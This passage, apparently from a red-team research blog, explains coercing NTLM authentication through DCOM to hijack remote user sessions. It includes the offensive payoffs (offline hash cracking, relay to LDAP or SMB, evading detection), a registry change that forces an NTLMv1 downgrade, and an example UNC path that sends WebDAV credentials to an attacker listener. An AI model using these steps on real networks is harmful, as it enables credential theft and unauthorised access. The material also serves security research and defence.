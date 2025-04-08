Now that we know it’s possible to convert a DCOM object into a session hijacking tool, the next step is to identify which Methods and Properties can be leveraged to complete the hijack. For this research, I explored whether user compromise could be achieved without running a payload - taking a different approach from most public DCOM lateral movement techniques.

I focused on achieving comparable results in a “fileless” format, meaning there’s no need to transfer or execute a payload on the target system. This distinction is important because transferring and running payloads on a target system is often considered an “expensive” action in Red Team operations. By avoiding this step, the risk of triggering common security controls is significantly reduced. Therefore, I aimed to compromise remote user accounts by coercing an NTLM authentication via DCOM.

There are several key benefits to coercing NTLM authentications rather than performing traditional lateral movement techniques:

Capture NTLMv1/NTLMv2 hashes and attempt to crack them offline

Relay NTLMv1 or WebDAV NTLMv2 hashes to other network services, such as LDAP or SMB, to perform actions as the affected user

Avoid transferring and running a payload on the target system, which typically draws more scrutiny from security tools

Avoid touching the LSASS process, thereby reducing detection risks

As of this writing, LDAP signing and channel binding are not required and enforced by default on most domain controllers. These security features are only mandatory on Windows Server 2025. This means that if we can coerce a NTLMv1 or WebDAV authentication from the target system, we can relay it to LDAP and perform actions as the affected user. Similarly, SMB signing is not required by default on Windows servers, except for domain controllers.

Another important consideration is that NTLMv1 hashes can be trivially cracked using rainbow tables, which have been publicly shared by Nic Losby as of December 2024. These tables drastically reduce the time and effort required to recover NTLM credentials from NTLMv1 hashes. To obtain an NTLMv1 hash instead of an NTLMv2 hash, we modify the following registry key on the target system:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

Setting LmCompatibilityLevel to a value of 2 or less forces the system to fall back to NTLMv1 for authentication. This modification is possible with local administrator privileges and is commonly referred to as a “NetNTLMv1 downgrade attack”.

Alternatively, we can capture a WebDAV authentication and relay it to LDAP, as HTTP-based authentications can be forwarded to this service. If the WebClient service is not already running with privileged access, we can remotely enable it on the target system. Once enabled, we can coerce a WebDAV NTLM authentication to our listener by specifying the machine’s NetBIOS name in the UNC path. For example:

\\MYHACKERBOX@80\giveme\creds.txt

For more information on NTLM relay attacks and the protocols that can be relayed to different endpoints, refer to the following resource here.